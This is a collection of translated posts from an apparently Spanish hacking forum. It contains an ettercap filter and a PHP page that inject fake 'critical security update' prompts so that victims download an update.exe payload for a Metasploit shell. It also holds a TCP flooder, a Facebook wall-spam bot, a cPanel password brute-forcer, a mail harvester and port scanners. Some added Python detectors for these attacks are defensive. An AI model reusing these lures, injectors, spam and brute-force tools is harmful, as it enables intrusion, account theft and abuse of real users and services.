2 Ideas on how to get them to download and use our payloads
by DarkSpark on Jan.26, 2010, under Vide0s
first of all, this is not a video tutorial; the intention is simply to show two different ways of getting the "victims" to download and run a payload and so obtain a shell with metasploit.
any questions about how the techniques used in the video are carried out can be asked in the forum =)
Filter used in the video (courtesy of Pandemic)
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Be-Owned");
    }
}
if (ip.proto == TCP && tcp.src == 80) {
    if (search(DATA.data, "<title>")) {
        replace("</title>", "</title><form action=\"http://192.168.1.67/update.exe\" method=\"link\"><center><img src=\"http://192.168.1.67/alert.jpg\"><br><br><INPUT TYPE=submit value=\"Descargar actualizacion\"></form><html><body><h1><font color=red>Alerta de seguridad</font></h1></body></html>");
        replace("<head>", "<head> <title> Software Upgrade </title> <body><font color=black size=10> Please download the last Active X security upgrade to Continue </font><body text=\"#ffffff\" link=\"#ffff33\" alink=\"#ffffcc\" alink=\"ffff00\"></center> </body> </head>");
        msg("Filtro activado.\n");
        msg("html inyectado exitosamente!!");
    }
}
Index used in the video:
<?php
$navegador = getenv("HTTP_USER_AGENT");
if (preg_match("/MSIE/i", "$navegador"))
{
echo "<html>
<head>
<META http-equiv='Content-Type' content='text/html; charset=utf-8'>
<style>
body
{
background-image:url('ie-8.jpg');
background-repeat: no-repeat;
background-position:center;
}
</style>
</head>
<body><h2 align='center'><font color='red'>Actualizacion Critica De Seguridad</font></h2><br>
<h3><pre><center><a href='http://www.microsoft.com/spain/technet/security/bulletin/ms10-002.mspx'>MS10-002:</a> trata las vulnerabilidades en Internet Explorer (KB 978207)Los profesionales de TI y los administradores de sistemas deben consultar <a href='http://www.microsoft.com/spain/technet/security/bulletin/current.mspx'>TechNet</a><br>de Microsoft para obtener información detallada acerca de estas actualizaciones.
</pre></h3>
<h2 align='center'><a href='update.exe'>Descargar Actualizacion</a></h2>";
}
else if (preg_match("/Mozilla/i", "$navegador"))
{
echo "<html>
<head>
<body background='bg.jpg'>
<table width=50% align='center'>
<tr>
<td><img src='banner.png' align='center'></td>
</tr>
</table> <center>
<h1 align='center'><font color=red>Actualizacion Critica De Seguridad</font></h1>
<h3>no te dejes sorprender actualiza firefox, y navega seguro por la red</h3>
<a href=http://192.168.1.67/update.exe>Descargar Actualizacion</a></center>";
}?>
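Both tricks above leave fingerprints in the traffic that a proxy log or IDS can look for. The following is an added example, not code from the original post or from its author: a small Python checker that audits an HTTP request and its response for the renamed Accept-Encoding header and for the markup the filter splices in after </title>. The function names, the regular expressions and the sample request/response are my own assumptions and constructed data; the only page-specific values reused are the Accept-Be-Owned header name and the 192.168.1.67/update.exe link that appear in the filter.

```python
"""Added example (not from the original post): spot the artefacts the
ettercap filter leaves in traffic, from an IDS or proxy-log perspective.
The sample request and responses below are constructed."""
import re

# Header the filter writes in place of Accept-Encoding so the server answers
# uncompressed and the body can be edited on the wire.
TAMPERED_HEADER = "accept-be-owned"

# A "security update" .exe served from an RFC 1918 address inside a page
# from a public site is a strong signal of on-path injection.
PRIVATE_EXE_LINK = re.compile(
    r"""https?://(?:10\.\d+\.\d+\.\d+|192\.168\.\d+\.\d+|172\.(?:1[6-9]|2\d|3[01])\.\d+\.\d+)
        [^\s"'>]*\.exe""",
    re.IGNORECASE | re.VERBOSE,
)

# Markup that should never directly follow </title>: the filter appends a
# <form> there because </title> is a cheap, unique insertion point.
INJECTED_AFTER_TITLE = re.compile(r"</title>\s*<(?:form|a|img|script)\b", re.IGNORECASE)


def parse_headers(raw):
    """Turn 'Name: value' lines into a dict keyed by lower-cased name."""
    headers = {}
    for line in raw.splitlines():
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def audit_request(raw_request):
    """Findings for a client request: the renamed Accept-Encoding header."""
    findings = []
    if TAMPERED_HEADER in parse_headers(raw_request):
        findings.append("request: Accept-Encoding renamed to Accept-Be-Owned (filter signature)")
    return findings


def audit_response(body):
    """Findings for a response body: injected markup and LAN-hosted executables."""
    findings = []
    if INJECTED_AFTER_TITLE.search(body):
        findings.append("response: markup injected directly after </title>")
    if len(re.findall(r"<html\b", body, re.IGNORECASE)) > 1:
        findings.append("response: more than one <html> element (appended document)")
    for link in PRIVATE_EXE_LINK.findall(body):
        findings.append("response: executable download from private address %s" % link)
    return findings


# Constructed samples: a request rewritten by the filter, a response carrying
# the injected form, and a clean response for comparison.
TAMPERED_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0)\r\n"
    "Accept-Be-Owned: gzip, deflate\r\n"
)
INJECTED_RESPONSE = (
    "<html><head><title>Example</title>"
    "<form action=\"http://192.168.1.67/update.exe\" method=\"link\">"
    "<input type=submit value=\"Descargar actualizacion\"></form>"
    "<html><body><h1>Alerta de seguridad</h1></body></html>"
)
CLEAN_RESPONSE = "<html><head><title>Example</title></head><body>hi</body></html>"

if __name__ == "__main__":
    for finding in audit_request(TAMPERED_REQUEST) + audit_response(INJECTED_RESPONSE):
        print("ALERT", finding)
    print("clean page findings:", audit_response(CLEAN_RESPONSE))
```

The header check is the cheapest of the three: a client never sends Accept-Be-Owned on its own, so one hit on that name is enough to raise an alert on the segment the filter is running on.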
sockeRTCP [s3cure]
by s3cure on Dec.26, 2009, under Toolz en Perl
hi hi:
Little Perl scripts with Tk. It is a Sock (it sends a sock endlessly {loop}) for TCP ports.
I hope you can figure out how to use it, it is very simple xD.
screenshot: http://img683.imageshack.us/img683/751/pantallazosockertcp.png
c0de:
#!/usr/bin/perl
####################################
# Hacking & Security Latin Team #
# - Illusions #
# hslteam.com! - illusions #
# c0dex by s3cure #
# sockeRTCP #
####################################
use IO::Socket;
use Tk;
system("clear");
print "Console:\n";
#configure
my $win = MainWindow->new();
$win->configure(-title => "sockeRTCP - Illusions", -background => "black");
$win->geometry('+600+450');
#frame1, label1 n entry1.
my $frame1 = $win->Frame(-relief=>'groove', -background => "black",)->pack(-side => 'top', -fill => 'x');
my $label1 = $frame1->Label(-text=> "Target:", -background => "black", -foreground => "white",)->pack(-side => 'left');
my $ent1 = $frame1->Entry(-width => 12, -background => "white")->pack(-side => 'left', -pady => 3);
#frame2, label2 n entry2.
my $frame2 = $win->Frame(-relief=>'groove', -background => "black",)->pack(-side => 'top', -fill => 'x');
my $label2 = $frame2->Label(-text=> "Port:", -background => "black", -foreground => "white",)->pack(-side => 'left');
my $ent2 = $frame2->Entry(-width => 4, -background => "white")->pack(-side => 'left', -pady => 3);
#frame3, label3 n entry3.
my $frame3 = $win->Frame(-relief=>'groove', -background => "black",)->pack(-side => 'top', -fill => 'x');
my $label3 = $frame3->Label(-text=> "Socket Print:", -background => "black", -foreground => "white",)->pack(-side => 'left');
my $ent3 = $frame3->Entry(-width => 10, -background => "white")->pack(-side => 'left', -pady => 3);
#button start
$ataque = $frame3->Button(-text=>"SockeR",-command => \&atack)->pack(-side=>'bottom');
#status
my $frame4 = $win->Frame(-relief=>'groove', -background => "black",)->pack(-side => 'top', -fill => 'x');
my $stat = $frame4->Text(-width => 38, -height => 1)->pack(-side=>'bottom');
sub atack
{
#get vars
$target = $ent1->get();
$port = $ent2->get();
$xz12 = $ent3->get();
$sock = new IO::Socket::INET (
PeerAddr => "$target",
PeerPort => "$port",
Proto => "TCP",
);
bucle:;
print $sock "$xz12";
goto bucle;
}
MainLoop();
regards, s3cure.
AutoInet [s3cure].
by s3cure on Dec.25, 2009, under Toolz en Perl
A script to configure the eth0 network and DNS on unix :) automated, in case you don't know the OS very well, etc. Mostly for practice :P
#!/usr/bin/perl
# AutoInet
# by s3cure | HSLTeam.com + - Illusions
# - Illusions.hslteam.com
use strict;
use warnings;

system("clear");
print "\nAutoInet configure\nby s3cure\nHSLTeam.com!\n- Illusions\n";
print "Configure internet with interfaces n resolv\n";
print "Follow instructions please.\n";
sleep(2);

# Read one line from STDIN and strip the trailing newline; without the chomp
# "Y\n" never equals "Y" and every question falls through to the else branch.
sub ask {
    my ($prompt) = @_;
    print $prompt;
    my $line = <STDIN>;
    chomp $line;
    return $line;
}

# Write to a root-owned file. "sudo echo x > file" does not work: the
# redirection is opened by the unprivileged shell, not by sudo, so the write
# is refused. Let sudo run tee, which opens the file as root.
sub root_write {
    my ($text, $file, $append) = @_;
    my $flag = $append ? "-a" : "";
    open(my $tee, "|-", "sudo tee $flag $file > /dev/null")
        or die "cannot run sudo tee: $!\n";
    print $tee $text;
    close($tee);
}

my $resp2 = ask("Configure Eth0? Y/N ");
if ($resp2 eq "Y")
{
    eth0();
}
else
{
    antdn();
}

sub eth0 {
    my $autoeth = ask("auto eth0? Y/N ");
    if ($autoeth eq "Y")
    {
        root_write("auto eth0\n", "/etc/network/interfaces", 0);
    }
    else
    {
        root_write("#auto eth0\n", "/etc/network/interfaces", 0);
    }
    root_write("iface eth0 inet static\n", "/etc/network/interfaces", 1);
    my $adress = ask("Address: ");
    root_write("\t address $adress\n", "/etc/network/interfaces", 1);
    my $netmask = ask("Netmask(default: 255.255.255.0): ");
    $netmask = "255.255.255.0" if $netmask eq "";
    root_write("\t netmask $netmask\n", "/etc/network/interfaces", 1);
    my $gateway = ask("Gateway: ");
    root_write("\t gateway $gateway\n", "/etc/network/interfaces", 1);
    print "Config Eth0 [Ok!]\n";
    sleep(1);
}

sub antdn {
    my $asd = ask("DNS Configure? Y/N ");
    if ($asd eq "Y")
    {
        dns();
    }
    else
    {
        view();
    }
}

sub dns {
    my $nameserver = ask("Nameserver1: ");
    root_write("nameserver $nameserver\n", "/etc/resolv.conf", 0);
    my $nameserv2 = ask("Nameserver2: ");
    root_write("nameserver $nameserv2\n", "/etc/resolv.conf", 1);
}

sub view {
    my $qew4 = ask("View results n restart networking? Y/N ");
    if ($qew4 eq "Y")
    {
        result();
    }
    else
    {
        dew();
    }
}

sub result {
    print "Inet results:\n";
    print "Network-Interfaces:\n";
    system("cat /etc/network/interfaces");
    print "DNS:\n";
    system("cat /etc/resolv.conf");
    print "Wait one moment...\n";
    system("sudo /etc/init.d/networking restart");
    print "Restart Network [Ok!]";
    sleep(1);
}

sub dew {
    print "s3cure: Thanks, visit HSLTeam.com n subdomains!\n";
    print "Press Intro to exit.\n";
    my $adios = <STDIN>;
}
regards.
Facebook-spam[bot] by s3cure.
by s3cure on Dec.23, 2009, under Toolz en Perl
Bot for spamming walls and that kind of Facebook junk. by s3cure.
requires samie and ole. win only /:.
#!c:/perl/bin
#c0dex by m0x.lk || HSLTeam.com
# Facebook-spam
system("cls");
system("color 03");
print "\nFacebook-spam\n";
print "c0dex by m0x.lk || HSLTeam.com\n";
print "Start SPAM -\n\n";
use Win32::OLE;
use Win32::SAM;
my $post;
my $text;
my $email;
my $pass;
$| = 1;
$Win32::OLE::Warn = 3;
print "Email: ";
$email=<STDIN>;
print "Passwd: ";
$pass=<STDIN>;
print "\nMURO-SPAM: ";
$post=<STDIN>;
print "Text-SPAM: ";
$text=<STDIN>;
print "\nStart-SPAM ++ (Ctrl + C to Close Script)\n";
StartIE();
Navigate("http://www.facebook.com/logout.php?h=adec46c20c48ec123573248cb3c2e6b5&t=1259627549&ref=mb");
SetEditBox("email","$email");
SetEditBox("pass","$pass");
ClickFormButton("Entrar");
spam: ;
Navigate("$post");
SetEditBox("add_comment_text","$text");
ClickFormButton("comment");
goto spam;
Check-Dirs [s3cure].
by s3cure on Dec.23, 2009, under Toolz en Perl
It is very simple to use. by s3cure.
#!/usr/bin/perl
##############
# Check-Dirs #
# by s3cure #
# HSLTeam.com#
# -Illusions #
##############
use LWP::Simple;
print "\nCheck-Dirs\n";
print "HSLTeam.com | - Illusions\nby s3cure\n";
print "\nTarget: ";
$target=<STDIN>;
print "Directory list: ";
$dirs=<STDIN>;
open(FILE, "<$dirs") || die "[!] Directory List -Not Found\n";
my @dirs=<FILE>;
close(FILE);
foreach my $dirs(@dirs){
$ua = LWP::UserAgent->new;
my $response = $ua->get("$target/$dirs");
if($response->status_line !~ m/^404/){
print(@ok,"$target/$dirs");
}
}
print "No more results\n";
regards.
cPanel bruteforce by s3cure.
by s3cure on Dec.20, 2009, under Toolz en Perl
cPanel bruteforce. by s3cure.
#!/usr/bin/perl
######################
# cPanel bruteforce  #
# s3cure|HSLTeam.com!#
######################
use WWW::Mechanize;
print "\nHacking & Security Latin Team\n";
print "cPanel bruteforce\n";
print "by s3cure - HSLTeam.com!\n";
print "\nTarget: ";
$url=<STDIN>;
print "Username: ";
$username=<STDIN>;
print "Passwd list: ";
$password=<STDIN>;
open (FILE, "<$password") || die "Not found passwd list.\n";
@PASSWORDS = <FILE>;
close PASSFILE;
foreach my $P (@PASSWORDS) {
chomp $P;
$passwd = $P;
}
my $mechanize = WWW::Mechanize->new(autocheck => 1);
$mechanize->get($url) || die "Failed connect to target!\n";
$mechanize->submit_form(
form_number => 1,
fields => {
login_username => $username,
login_password => $passwd
}
);
print $mechanize->content( );
if (content =~ /Find/) {
print "\nPassword: $passwd";
exit(0);
}
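Seen from the server, a password-list run like the script above is a burst of failed logins for one account from one address, and, if the list contains the password, a success right after the burst. The following is an added example, not part of s3cure's post: a Python detector over constructed login records. The "<time> <source> <user> <result>" line format is made up for the example and is not cPanel's real log layout; the function names and thresholds are my own assumptions.

```python
"""Added example (not from the original post): flag a burst of failed logins
for one (source, user) pair, and a success that follows such a burst.
The log format and the lines below are constructed for the example."""
from collections import defaultdict, deque
from datetime import datetime

THRESHOLD = 5   # failures that trigger an alert ...
WINDOW = 60     # ... within this many seconds

# Constructed sample: one address hammers "admin" and then gets in;
# a second address has a single typo and logs in normally later.
SAMPLE_LOG = """\
2009-12-20T10:00:01 198.51.100.7 admin FAILED
2009-12-20T10:00:02 198.51.100.7 admin FAILED
2009-12-20T10:00:02 198.51.100.7 admin FAILED
2009-12-20T10:00:03 198.51.100.7 admin FAILED
2009-12-20T10:00:04 198.51.100.7 admin FAILED
2009-12-20T10:00:05 198.51.100.7 admin SUCCESS
2009-12-20T10:00:30 203.0.113.9 alice FAILED
2009-12-20T10:03:00 203.0.113.9 alice SUCCESS
"""


def parse_line(line):
    """'<time> <source> <user> <result>' -> (datetime, source, user, result)."""
    ts, src, user, result = line.split()
    return datetime.fromisoformat(ts), src, user, result


def detect_bruteforce(log_text, threshold=THRESHOLD, window=WINDOW):
    """Return alerts as (kind, source, user, iso_time).

    "burst": the threshold-th failure for one (source, user) inside the window.
    "success-after-burst": a login that succeeds for a pair already flagged,
    which is what a list that contained the right password looks like.
    """
    recent = defaultdict(deque)   # (source, user) -> failure times inside the window
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, user, result = parse_line(line)
        key = (src, user)
        q = recent[key]
        # Slide the window: drop failures older than `window` seconds
        while q and (ts - q[0]).total_seconds() > window:
            q.popleft()
        if result == "FAILED":
            q.append(ts)
            if len(q) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append(("burst", src, user, ts.isoformat()))
        elif result == "SUCCESS" and key in flagged:
            alerts.append(("success-after-burst", src, user, ts.isoformat()))
    return alerts


def sources_to_block(alerts):
    """Addresses that produced a burst, for a temporary firewall or lockout rule."""
    return sorted({src for kind, src, _, _ in alerts if kind == "burst"})


if __name__ == "__main__":
    found = detect_bruteforce(SAMPLE_LOG)
    for alert in found:
        print("ALERT", *alert)
    print("block:", sources_to_block(found))
```

Counting per (source, user) rather than per source alone keeps a NAT gateway with many users from tripping the rule on unrelated typos; the threshold and window are the knobs to tune against real traffic.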
Mail Xtractor by s3cure
by s3cure on Dec.20, 2009, under Toolz en Perl
MailXtractor by s3cure.
#!/usr/bin/perl
# MailXtractor
# by s3cure
# HSLTeam.com!
use strict;
use warnings;

print "MailXtractor by s3cure|m0x.lk\n";
print "HSLTeam.com!\n\n";
print "Mails.txt: ";
my $mailtxt = <STDIN>;
chomp $mailtxt;
print "Output.txt: ";
my $outmail = <STDIN>;
chomp $outmail;
print "Start...\n";

open(my $in, "<", $mailtxt) || die "Not found $mailtxt\n";
my @SEARCH = <$in>;
close($in);

# Open the output once: opening it with ">" inside the loop truncated it on
# every match, so only the last address survived.
open(my $out, ">", $outmail) || die "Cannot write $outmail\n";
foreach my $line (@SEARCH) {
    # Print the captured address, not the whole input line; /g picks up
    # every address on the line rather than only the first
    while ($line =~ m{(\w+\@[\w.]+)}g) {
        print $out "$1\n";
    }
}
close($out);
print "\nMailtxt: $mailtxt\n";
print "Output result: $outmail\n";
print "Ready n result saved.";
print "\nHSLTeam.com!\n";
Port-Scanner.
by s3cure on Dec.14, 2009, under Toolz en Perl
Read the instructions :) by 0x8c.
#!/usr/bin/perl
use IO::Socket::INET;
use Getopt::Long;

my $ip = $ARGV[0];
my %options = ();
GetOptions( \%options, "r=s", "p=s" );

print q {
================================================================================
# title: Port scanner
# coder: 0x8c
# site: www.hslteam.com
# e-mail: < 0x8c.security@gmail.com >

Usage: perl portscanner.pl [ip] {options}

Options:
-r [start_port-end_port] define range to scan.
-p [ip:port] scan with proxy support.
================================================================================
};

if( !$ip ) {
    die "[+] Need to define ip to scan\n";
}

my( $proxy_address, $proxy_port, @proxy );
if( $options{"p"} ) {
    @proxy = split( /:/, $options{"p"}, 2 );
    $proxy_address = $proxy[0];
    $proxy_port = $proxy[1];
    print "[+] Proxy armed...\n\n";
}
else {
    $proxy_address = "127.0.0.1";
    $proxy_port = "";
    print "[+] No proxy...\n";
}

my( $port, $start_port, $end_port, @ports, $scan );
if( $options{"r"} ) {
    print "[+] Range defined...\n";
    @ports = split( /-/, $options{"r"}, 2 );
    $start_port = $ports[0];
    $end_port = $ports[1];
    print "[+] Open port(s):";
    for( $port = $start_port; $port <= $end_port; $port++ ) {
        $scan = scan( $ip, $port );
        if( $scan eq "done" ) {
            print " $port -";
        }
    }
}
else {
    @ports = qw ( 21 22 23 25 43 59 79 80 110 113 119 135 139 445 548 1025 5000 5900 6660 6661 6662 6663 6665 6666 6667 6668 6669 7000 8000 8018 8080 );
    print "[+] Open port(s):";
    foreach $port( @ports ) {
        $scan = scan( $ip, $port );
        if( $scan eq "done" ) {
            print " $port -";
        }
    }
}

sub scan {
    my $connect = IO::Socket::INET->new (
        Proto => 'tcp',
        PeerAddr => $ip,
        PeerPort => $port,
        ProxyAddr => $proxy_address,
        ProxyPort => $proxy_port
    );
    if( $connect ) {
        return "done";
    }
    close( $connect );
}
Base64 Enc/Dec. [0x8c].
by s3cure on Dec.07, 2009, under Toolz C / C++ / C#
by 0x8c.
/**********************************/
/*                                */
/* Autor : 0x8c                   */
/* Web: www.HSLTeam.com           */
/*                                */
/**********************************/
#include <stdlib.h>
#include <string.h>   // libc strlen; the original redefined it, which clashes with the built-in

// Return the power of given number
int powz (int base, int exp)
{
    int ris = 1, c = 0;
    while (c < exp)
    {
        ris *= base;
        c++;
    }
    return ris;
}

// Return decimal value of a binary number (n[0] is the most significant of exp+1 bits)
int bin2dec (int* n, int exp)
{
    int dec = 0, c = 0, x = exp+1;
    while (c < x)
    {
        dec += powz (2, exp) * n [c];
        exp--;
        c++;
    }
    return dec;
}

// Return the 6-bit binary value of given decimal number (caller frees the result)
int* dec2bin (int n)
{
    int* dec = (int*) malloc (6*sizeof (int));
    int c = 5;
    while (n >= 1)
    {
        if (n % 2 == 0)
            dec [c] = 0;
        else
            dec [c] = 1;
        n /= 2;
        c--;
    }
    while (c >= 0)
    {
        dec [c] = 0;
        c--;
    }
    return dec;
}

// Return the 8-bit binary value of given character (caller frees the result)
int* char2bin (char x)
{
    // Read the byte as unsigned: a char above 0x7f is negative on most platforms,
    // which made the loop below skip it and encode it as all zeros
    int d = (unsigned char) x, c = 7;
    int* n = (int*) malloc (8*sizeof (int));
    while (d >= 1)
    {
        if (d % 2 == 0)
            n [c] = 0;
        else
            n [c] = 1;
        d /= 2;
        c--;
    }
    while (c >= 0)
    {
        n [c] = 0;
        c--;
    }
    return n;
}

// Return base64 value of given string (caller frees the result)
char* base64_encode (char* string)
{
    char chr [] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    int len = (int) strlen (string);
    if (len == 0)
    {
        char* empty = (char*) malloc (1);
        empty [0] = '\x00';
        return empty;
    }
    int binval [len] [8];
    int *tmp;
    int y,x, tmp_x, tmp_y, oth_y, u = 0;
    y = 0;
    while (y < len)
    {
        tmp = char2bin (string [y]);
        x = 0;
        while (x < 8)
        {
            binval [y] [x] = tmp [x];
            x++;
        }
        free (tmp);   // char2bin allocates; the original leaked every call
        y++;
    }
    // y = number of 6-bit groups, u = number of zero bits padding the last group
    if (len*8 % 6 == 0)
        y = len*8/6;
    else
    {
        y = len*8/6 + 1;
        u = y*6 - len*8;
    }
    int sixsqr [y] [6];
    x = 0;
    oth_y = 0;
    tmp_x = 0;
    tmp_y = 0;
    while (tmp_y < y)
    {
        // Bits beyond the input are padding and read as zero; the original
        // read past the end of binval here
        if (oth_y < len)
            sixsqr [tmp_y] [tmp_x] = binval [oth_y] [x];
        else
            sixsqr [tmp_y] [tmp_x] = 0;
        if (x == 7)
        {
            x = 0;
            oth_y++;
        }
        else
            x++;
        if (tmp_x == 5)
        {
            tmp_y++;
            tmp_x = 0;
        }
        else
            tmp_x++;
    }
    // y symbols, u/2 '=' characters and the terminating NUL the original omitted
    char* base64 = (char*) malloc (y + u/2 + 1);
    tmp = (int*) malloc (6*sizeof (int));
    tmp_y = 0;
    while (tmp_y < y)
    {
        tmp_x = 0;
        while (tmp_x < 6)
        {
            tmp [tmp_x] = sixsqr [tmp_y] [tmp_x];
            tmp_x++;
        }
        base64 [tmp_y] = chr [bin2dec (tmp,5)];
        tmp_y++;
    }
    while (u > 0)
    {
        base64 [tmp_y] = '=';
        tmp_y++;
        u -= 2;
    }
    base64 [tmp_y] = '\x00';
    free (tmp);
    return base64;
}

// Return text value of given base64 string. The argument is modified in place
// to strip the '=' padding, so pass a writable buffer, not a string literal.
// Returns NULL on a character outside the alphabet; caller frees the result.
char* base64_decode (char* base64)
{
    char chr [] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    int x = 0, y, pos, tmp_x, tmp_y, oth_y;
    int* tmp;
    while (x < (int) strlen (base64))
    {
        if (base64 [x] == '=')
            base64 [x] = '\x00';
        x++;
    }
    int n = (int) strlen (base64);
    if (n < 2)
    {
        // Nothing decodable: empty input or a lone symbol
        char* empty = (char*) malloc (1);
        empty [0] = '\x00';
        return empty;
    }
    int sixsqr [n] [6];
    y = 0;
    while (y < n)
    {
        pos = 0;
        while (chr [pos] != '\x00' && chr [pos] != base64 [y])
            pos++;
        if (chr [pos] == '\x00')
            return NULL;   // not a base64 symbol; the original ran past the alphabet
        tmp = dec2bin (pos);
        x = 0;
        while (x < 6)
        {
            sixsqr [y] [x] = tmp [x];
            x++;
        }
        free (tmp);
        y++;
    }
    y = n*6/8;
    int eightsqr [y] [8];
    tmp_x = 0;
    tmp_y = 0;
    oth_y = 0;
    x = 0;
    while (tmp_y < y)
    {
        eightsqr [tmp_y] [tmp_x] = sixsqr [oth_y] [x];
        if (tmp_x == 7)
        {
            tmp_y++;
            tmp_x = 0;
        }
        else
            tmp_x++;
        if (x == 5)
        {
            oth_y++;
            x = 0;
        }
        else
            x++;
    }
    // y bytes plus the terminating NUL the original omitted
    char* string = (char*) malloc (y + 1);
    tmp = (int*) malloc (8*sizeof (int));
    tmp_y = 0;
    while (tmp_y < y)
    {
        tmp_x = 0;
        while (tmp_x < 8)
        {
            tmp [tmp_x] = eightsqr [tmp_y] [tmp_x];
            tmp_x++;
        }
        string [tmp_y] = (char) bin2dec (tmp,7);
        tmp_y++;
    }
    string [y] = '\x00';
    free (tmp);
    return string;
}
Port Scanner [0x8c]
by s3cure on Dec.07, 2009, under Toolz C / C++ / C#
Hi hi, tool for scanning ports by 0x8c.
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>

int main(int argc, char *argv[] )
{
    int status, sock, min_port, max_port, port;
    char *ip;
    // "65535" plus the NUL: the original malloc(4) overflowed on ports of four or more digits
    char port_string[6];
    struct addrinfo hints, *res, *p;
    printf("\nPort Scanner\n");
    printf("\nWritten by 0x8c\n");
    if ( argc != 4 ) {
        fprintf(stderr,"Too few argument! Usage >> ./port_scan 'ip_addr' 'min_port' 'max_port'\n\n");
        return 1;
    }
    min_port = atoi(argv[2]);
    max_port = atoi(argv[3]);
    if ( min_port < 1 || max_port > 65535 || min_port > max_port ) {
        fprintf(stderr,"Port range must lie between 1 and 65535\n");
        return 1;
    }
    // +1 for the terminating NUL; the original allocated one byte too few
    ip = ( char * ) malloc ( strlen (argv[1]) + 1 );
    strcpy(ip, argv[1]);
    memset (&hints, 0, sizeof hints);
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    for ( port = min_port; port <= max_port; port++ ) {
        snprintf(port_string, sizeof port_string, "%d", port);
        if ( ( status = getaddrinfo( ip, port_string, &hints, &res ) ) != 0 ) {
            fprintf(stderr,"getaddrinfo() error : %s\n", gai_strerror(status));
            free(ip);
            return 1;
        }
        for ( p = res; p != NULL; p = p->ai_next) {
            if ( ( sock = socket( p->ai_family, p->ai_socktype, p->ai_protocol)) == -1 ) {
                fprintf(stderr,"Couldn't create socket! Exiting!\n");
                freeaddrinfo(res);
                free(ip);
                return 2;
            }
            if ( connect( sock, p->ai_addr, p->ai_addrlen ) == 0 ) {
                printf("Opened port %s on : %s\n", port_string, ip);
            }
            // One close for both outcomes; the original closed a failed socket twice
            close(sock);
        }
        freeaddrinfo(res);
    }
    free(ip);
    printf("Correctly scanned...\n");
    getchar();
    return 0;
}
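From the target's side, a connect() sweep like this scanner or the Perl one under Toolz en Perl shows up as one address touching many distinct ports on a host within seconds, most of them refused. The following is an added example, not part of either post: a Python detector over constructed firewall-style connection records. The "<time> <src> <dst> <dport> <ACCEPT|REJECT>" format, the sample records, the threshold and the function names are my own assumptions; the port list in the sample reuses the first ten defaults of the Perl scanner.

```python
"""Added example (not from either port-scanner post): flag a source that
contacts many distinct ports on one host inside a short window, which is
what a connect() sweep looks like to the scanned host.  The record format
and the sample records are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

PORT_THRESHOLD = 10              # distinct ports on one host ...
WINDOW = timedelta(seconds=30)   # ... within this window


def _constructed_records():
    """Build the sample log: one source sweeps ten ports of 10.0.0.5 (only
    22 and 80 answer) while an ordinary client talks to 80 and 443."""
    base = datetime(2009, 12, 7, 12, 0, 0)
    open_ports = {22, 80}
    lines = []
    for i, port in enumerate([21, 22, 23, 25, 43, 59, 79, 80, 110, 113]):
        action = "ACCEPT" if port in open_ports else "REJECT"
        stamp = (base + timedelta(seconds=i)).isoformat()
        lines.append("%s 198.51.100.7 10.0.0.5 %d %s" % (stamp, port, action))
    for i in range(4):
        stamp = (base + timedelta(seconds=5 * i)).isoformat()
        lines.append("%s 203.0.113.9 10.0.0.5 %d ACCEPT" % (stamp, 80 if i % 2 == 0 else 443))
    return "\n".join(lines)


SAMPLE_RECORDS = _constructed_records()


def parse_record(line):
    """'<time> <src> <dst> <dport> <ACCEPT|REJECT>' -> tuple (constructed format)."""
    ts, src, dst, port, action = line.split()
    return datetime.fromisoformat(ts), src, dst, int(port), action


def detect_port_sweeps(log_text, threshold=PORT_THRESHOLD, window=WINDOW):
    """Map (src, dst) -> (first_seen_iso, distinct_ports, rejected_fraction)
    for every pair whose distinct destination ports inside `window` reach
    `threshold`.  The rejected fraction is the second signal: a sweep mostly
    hits closed ports, a real client mostly hits open ones."""
    history = defaultdict(list)   # (src, dst) -> [(ts, port, action)] inside the window
    sweeps = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, action = parse_record(line)
        key = (src, dst)
        hist = history[key]
        hist.append((ts, port, action))
        # Slide the window: forget events older than `window`
        while hist and ts - hist[0][0] > window:
            hist.pop(0)
        ports = {p for _, p, _ in hist}
        if len(ports) >= threshold and key not in sweeps:
            rejected = sum(1 for _, _, a in hist if a == "REJECT")
            sweeps[key] = (hist[0][0].isoformat(), len(ports), rejected / len(hist))
    return sweeps


if __name__ == "__main__":
    for (src, dst), (first, count, frac) in detect_port_sweeps(SAMPLE_RECORDS).items():
        print("ALERT %s swept %d ports on %s starting %s (%.0f%% rejected)"
              % (src, count, dst, first, frac * 100))
```

Keying on (src, dst) catches the vertical sweep both scanners perform; a horizontal sweep (one port across many hosts) needs the mirror-image count of distinct destinations per (src, port), which is the same loop with the roles of dst and port swapped.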
http://www.hslteam.com/forum/index.php?topic=1347.0